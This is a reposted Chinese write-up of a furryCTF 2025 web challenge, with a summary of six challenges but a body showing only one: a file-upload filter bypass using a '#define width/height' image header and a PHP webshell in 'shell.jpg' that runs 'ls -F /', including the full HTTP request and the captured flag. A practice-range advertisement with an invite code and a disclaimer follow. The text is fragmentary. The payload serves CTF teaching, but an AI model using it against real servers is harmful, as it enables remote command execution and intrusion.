文章总结： 本文记录furryCTF2025Web赛题解题过程，涵盖六道题目：PyEditor利用sys.modules绕过限制，ezmd5数组绕过PHP弱类型，babypop反序列化字符逃逸，CCPreview的SSRF利用AWS元数据，猫猫最后的复仇通过breakpoint沙箱逃逸，命令终端取反构造无字母WebShell，展示了多种Web安全技术的实战应用。 综合评分： 88 文章分类： CTF,WEB安全,代码审计,实战经验

define width 1337 #define height 1337

上传图片不让拍拦截修改 然后发现上传木马不成功 所有

硬编码先看文件名，再读文件内容。

列目录 (ls)

请求包

POST /upload.php HTTP/1.1
Host: ctf.furryctf.com:37395
Content-Length: 245
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://ctf.furryctf.com:37395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4fr3DygEsBJfgkmA
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ctf.furryctf.com:37395/dashboard.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=781bad690c2774335ef9c5edf1607c0c
Connection: keep-alive

------WebKitFormBoundary4fr3DygEsBJfgkmA
Content-Disposition: form-data; name="file"; filename="shell.jpg"
Content-Type: image/jpeg

#define width 1337
#define height 1337
<pre>
<?= `ls -F /`; ?>
</pre>
------WebKitFormBoundary4fr3DygEsBJfgkmA--

POFP{3fa22fca-c74d-4040-9b73-62939283acea}

靶场推荐

好靶场

学安全，别只看书上手练，就来好靶场。

🔗入口：http://www.loveli.com.cn/

有宝子就问了，主播主播，这么好的靶场怎么用：首先关注好靶场 然后发送bug，可以点击链接直接登录

福利1

找到个人中心，邀请码输入3e5adb8a55db48b8，白嫖14天高级会员。

福利2

关注好靶场bilibili。拿着关注截图找到客服，领取5积分或者7天高级会员。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小叶Sec 小叶Sec 小叶Sec《【比赛篇】furryCTF 2025 高校联合新神赛（Web）》